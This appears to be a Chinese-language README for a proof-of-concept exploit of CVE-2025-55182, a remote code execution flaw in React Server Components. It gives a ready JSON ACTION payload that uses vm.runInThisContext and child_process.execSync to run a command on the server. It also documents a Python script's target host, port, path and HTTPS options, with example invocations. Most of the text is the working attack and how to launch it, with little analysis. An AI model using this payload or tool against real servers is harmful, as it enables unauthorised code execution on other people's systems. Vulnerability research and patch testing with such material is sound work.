本项目为 CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept,演示在特定条件下可通过 vm.runInThisContext 与 恶意 ACTION payload 触发远程代码执行。
React Server Components 的 ACTION payload 在某些条件下会:
攻击者可构造 payload:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| 参数 | 是否必填 | 默认值 | 说明 |
|---|---|---|---|
--host | 是 | 无 | 目标服务器的 IP 或域名。例如:127.0.0.1、192.168.1.10、example.com |
--port | 否 | 80 | 目标 HTTP 服务端口,例如:3003 |
--path | 是 | 无 | 目标可触发漏洞的路由路径,例如:/feedback、/action |
--https | 否 | False | 是否使用 HTTPS 发送 payload(默认 HTTP) |
python a.py --host <目标IP> --port <端口> --path <目标URL路径>
python a.py --host 127.0.0.1 --port 3003 --path /feedback